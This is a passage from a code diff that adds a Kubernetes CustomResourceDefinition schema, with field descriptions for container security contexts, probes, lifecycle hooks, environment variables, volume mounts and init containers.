privileged mode. + Processes in privileged containers are essentially + equivalent to root on the host. Defaults to + false. + type: boolean + procMount: + description: procMount denotes the type of proc + mount to use for the containers. The default + is DefaultProcMount which uses the container + runtime defaults for readonly paths and masked + paths. This requires the ProcMountType feature + flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only + root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of + the container process. Uses runtime default + if unset. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must + run as a non-root user. If true, the Kubelet + will validate the image at runtime to ensure + that it does not run as UID 0 (root) and fail + to start the container if it does. If unset + or false, no such validation will be performed. + May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of + the container process. Defaults to user specified + in image metadata if unspecified. May also + be set in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, the + value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied + to the container. If unspecified, the container + runtime will allocate a random SELinux context + for each container. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + level: + description: Level is SELinux level label + that applies to the container. + type: string + role: + description: Role is a SELinux role label + that applies to the container. + type: string + type: + description: Type is a SELinux type label + that applies to the container. + type: string + user: + description: User is a SELinux user label + that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this + container. If seccomp options are provided + at both the pod & container level, the container + options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates + a profile defined in a file on the node + should be used. The profile must be preconfigured + on the node to work. Must be a descending + path, relative to the kubelet's configured + seccomp profile location. Must only be + set if type is "Localhost". + type: string + type: + description: "type indicates which kind + of seccomp profile will be applied. Valid + options are: \n Localhost - a profile + defined in a file on the node should be + used. RuntimeDefault - the container runtime + default profile should be used. Unconfined + - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied + to all containers. If unspecified, the options + from the PodSecurityContext will be used. + If set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where + the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) + inlines the contents of the GMSA credential + spec named by the GMSACredentialSpecName + field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the + name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a + container should be run as a 'Host Process' + container. This field is alpha-level and + will only be honored by components that + enable the WindowsHostProcessContainers + feature flag. Setting this field without + the feature flag will result in errors + when validating the Pod. All of a Pod's + containers must have the same effective + HostProcess value (it is not allowed to + have a mix of HostProcess containers and + non-HostProcess containers). In addition, + if HostProcess is true then HostNetwork + must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to + run the entrypoint of the container process. + Defaults to the user specified in image + metadata if unspecified. May also be set + in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, + the value specified in SecurityContext + takes precedence. + type: string + type: object + type: object + startupProbe: + description: Probes are not allowed for ephemeral + containers. + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate + a buffer for stdin in the container runtime. If + this is not set, reads from stdin in the container + will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should + close the stdin channel after it has been opened + by a single attach. When stdin is true the stdin + stream will remain open across multiple attach + sessions. If stdinOnce is set to true, stdin is + opened on container start, is empty until the + first client attaches to stdin, and then remains + open and accepts data until the client disconnects, + at which time stdin is closed and remains closed + until the container is restarted. If this flag + is false, a container processes that reads from + stdin will never receive an EOF. Default is false + type: boolean + targetContainerName: + description: If set, the name of the container from + PodSpec that this ephemeral container targets. + The ephemeral container will be run in the namespaces + (IPC, PID, etc) of this container. If not set + then the ephemeral container is run in whatever + namespaces are shared for the pod. Note that the + container runtime must support this feature. + type: string + terminationMessagePath: + description: 'Optional: Path at which the file to + which the container''s termination message will + be written is mounted into the container''s filesystem. + Message written is intended to be brief final + status, such as an assertion failure message. + Will be truncated by the node if greater than + 4096 bytes. The total message length across all + containers will be limited to 12kb. Defaults to + /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message + should be populated. File will use the contents + of terminationMessagePath to populate the container + status message on both success and failure. FallbackToLogsOnError + will use the last chunk of container log output + if the termination message file is empty and the + container exited with an error. The log output + is limited to 2048 bytes or 80 lines, whichever + is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate + a TTY for itself, also requires 'stdin' to be + true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block + devices to be used by the container. + items: + description: volumeDevice describes a mapping + of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside + of the container that the device will be + mapped to. + type: string + name: + description: name must match the name of a + persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's + filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting + of a Volume within a container. + properties: + mountPath: + description: Path within the container at + which the volume should be mounted. Must + not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how + mounts are propagated from the host to container + and the other way around. When not set, + MountPropagationNone is used. This field + is beta in 1.10. + type: string + name: + description: This must match the Name of a + Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write + otherwise (false or unspecified). Defaults + to false. + type: boolean + subPath: + description: Path within the volume from which + the container's volume should be mounted. + Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume + from which the container's volume should + be mounted. Behaves similarly to SubPath + but environment variable references $(VAR_NAME) + are expanded using the container's environment. + Defaults to "" (volume's root). SubPathExpr + and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not + specified, the container runtime's default will + be used, which might be configured in the container + image. Cannot be updated. + type: string + required: + - name + type: object + type: array + hostAliases: + description: HostAliases is an optional list of hosts + and IPs that will be injected into the pod's hosts file + if specified. This is only valid for non-hostNetwork + pods. + items: + description: HostAlias holds the mapping between IP + and hostnames that will be injected as an entry in + the pod's hosts file. + properties: + hostnames: + description: Hostnames for the above IP address. + items: + type: string + type: array + ip: + description: IP address of the host file entry. + type: string + type: object + type: array + hostIPC: + description: 'Use the host''s ipc namespace. Optional: + Default to false.' + type: boolean + hostNetwork: + description: Host networking requested for this pod. Use + the host's network namespace. If this option is set, + the ports that will be used must be specified. Default + to false. + type: boolean + hostPID: + description: 'Use the host''s pid namespace. Optional: + Default to false.' + type: boolean + hostname: + description: Specifies the hostname of the Pod If not + specified, the pod's hostname will be set to a system-defined + value. + type: string + imagePullSecrets: + description: 'ImagePullSecrets is an optional list of + references to secrets in the same namespace to use for + pulling any of the images used by this PodSpec. If specified, + these secrets will be passed to individual puller implementations + for them to use. For example, in the case of docker, + only DockerConfig type secrets are honored. More info: + https://kubernetes.io/docs/concepts/containers/images#specifying-imagepullsecrets-on-a-pod' + items: + description: LocalObjectReference contains enough information + to let you locate the referenced object inside the + same namespace. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, kind, + uid?' + type: string + type: object + type: array + initContainers: + description: 'List of initialization containers belonging + to the pod. Init containers are executed in order prior + to containers being started. If any init container fails, + the pod is considered to have failed and is handled + according to its restartPolicy. The name for an init + container or normal container must be unique among all + containers. Init containers may not have Lifecycle actions, + Readiness probes, Liveness probes, or Startup probes. + The resourceRequirements of an init container are taken + into account during scheduling by finding the highest + request/limit for each resource type, and then using + the max of of that value or the sum of the normal containers. + Limits are applied to init containers in a similar fashion. + Init containers cannot currently be added or removed. + Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/' + items: + description: A single application container that you + want to run within a pod. + properties: + args: + description: 'Arguments to the entrypoint. The docker + image''s CMD is used if this is not provided. + Variable references $(VAR_NAME) are expanded using + the container''s environment. If a variable cannot + be resolved, the reference in the input string + will be unchanged. Double $$ are reduced to a + single $, which allows for escaping the $(VAR_NAME) + syntax: i.e. "$$(VAR_NAME)" will produce the string + literal "$(VAR_NAME)". Escaped references will + never be expanded, regardless of whether the variable + exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within + a shell. The docker image''s ENTRYPOINT is used + if this is not provided. Variable references $(VAR_NAME) + are expanded using the container''s environment. + If a variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows for + escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" + will produce the string literal "$(VAR_NAME)". + Escaped references will never be expanded, regardless + of whether the variable exists or not. Cannot + be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set + in the container. Cannot be updated. + items: + description: EnvVar represents an environment + variable present in a Container. + properties: + name: + description: Name of the environment variable. + Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) + are expanded using the previously defined + environment variables in the container and + any service environment variables. If a + variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows + for escaping the $(VAR_NAME) syntax: i.e. + "$$(VAR_NAME)" will produce the string literal + "$(VAR_NAME)". Escaped references will never + be expanded, regardless of whether the variable + exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's + value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: + supports metadata.name, metadata.namespace, + `metadata.labels['''']`, `metadata.annotations['''']`, + spec.nodeName, spec.serviceAccountName, + status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema + the FieldPath is written in terms + of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to + select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the + container: only resources limits and + requests (limits.cpu, limits.memory, + limits.ephemeral-storage, requests.cpu, + requests.memory and requests.ephemeral-storage) + are currently supported.' + properties: + containerName: + description: 'Container name: required + for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output + format of the exposed resources, + defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to + select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret + in the pod's namespace + properties: + key: + description: The key of the secret + to select from. Must be a valid + secret key. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment + variables in the container. The keys defined within + a source must be a C_IDENTIFIER. All invalid keys + will be reported as an event when the container + is starting. When a key exists in multiple sources, + the value associated with the last source will + take precedence. Values defined by an Env with + a duplicate key will take precedence. Cannot be + updated. + items: + description: EnvFromSource represents the source + of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend + to each key in the ConfigMap. Must be a + C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images + This field is optional to allow higher level config + management to default or override container images + in workload controllers like Deployments and StatefulSets.' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, + Never, IfNotPresent. Defaults to Always if :latest + tag is specified, or IfNotPresent otherwise. Cannot + be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Actions that the management system + should take in response to container lifecycle + events. Cannot be updated. + properties: + postStart: + description: 'PostStart is called immediately + after a container is created. If the handler + fails, the container is terminated and restarted + according to its restart policy. Other management + of the container blocks until the hook completes. + More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately + before a container is terminated due to an + API request or management event such as liveness/startup + probe failure, preemption, resource contention, + etc. The handler is not called if the container + crashes or exits. The reason for termination + is passed to the handler. The Pod''s termination + grace period countdown begins before the PreStop + hooked is executed. Regardless of the outcome + of the handler, the container will eventually + terminate within the Pod''s termination grace + period. Other management of the container + blocks until the hook completes or until the + termination grace period is reached. More + info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: 'Periodic probe of container liveness. + Container will be restarted if the probe fails. + Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the container specified as + a DNS_LABEL. Each container in a pod must have + a unique name (DNS_LABEL). Cannot be updated. + type: string + ports: + description: List of ports to expose from the container. + Exposing a port here gives the system additional + information about the network connections a container + uses, but is primarily informational. Not specifying + a port here DOES NOT prevent that port from being + exposed. Any port which is listening on the default + "0.0.0.0" address inside a container will be accessible + from the network. Cannot be updated. + items: + description: ContainerPort represents a network + port in a single container. + properties: + containerPort: + description: Number of port to expose on the + pod's IP address. This must be a valid port + number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external + port to. + type: string + hostPort: + description: Number of port to expose on the + host. If specified, this must be a valid + port number, 0 < x < 65536. If HostNetwork + is specified, this must match ContainerPort. + Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an + IANA_SVC_NAME and unique within the pod. + Each named port in a pod must have a unique + name. Name for the port that can be referred + to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, + TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + x-kubernetes-list-map-keys: + - containerPort + - protocol + x-kubernetes-list-type: map + readinessProbe: + description: 'Periodic probe of container service + readiness. Container will be removed from service + endpoints if the probe fails. Cannot be updated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: 'Compute Resources required by this + container. Cannot be updated. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount + of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum + amount of compute resources required. If Requests + is omitted for a container, it defaults to + Limits if that is explicitly specified, otherwise + to an implementation-defined value. More info: + https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'SecurityContext defines the security + options the container should be run with. If set, + the fields of SecurityContext override the equivalent + fields of PodSecurityContext. More info: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls + whether a process can gain more privileges + than its parent process. This bool directly + controls if the no_new_privs flag will be + set on the container process. AllowPrivilegeEscalation + is true always when the container is: 1) run + as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when + running containers. Defaults to the default + set of capabilities granted by the container + runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. + Processes in privileged containers are essentially + equivalent to root on the host. Defaults to + false. + type: boolean + procMount: + description: procMount denotes the type of proc + mount to use for the containers. The default + is DefaultProcMount which uses the container + runtime defaults for readonly paths and masked + paths. This requires the ProcMountType feature + flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only + root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of + the container process. Uses runtime default + if unset. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must + run as a non-root user. If true, the Kubelet + will validate the image at runtime to ensure + that it does not run as UID 0 (root) and fail + to start the container if it does. If unset + or false, no such validation will be performed. + May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of + the container process. Defaults to user specified + in image metadata if unspecified. May also + be set in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, the + value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The 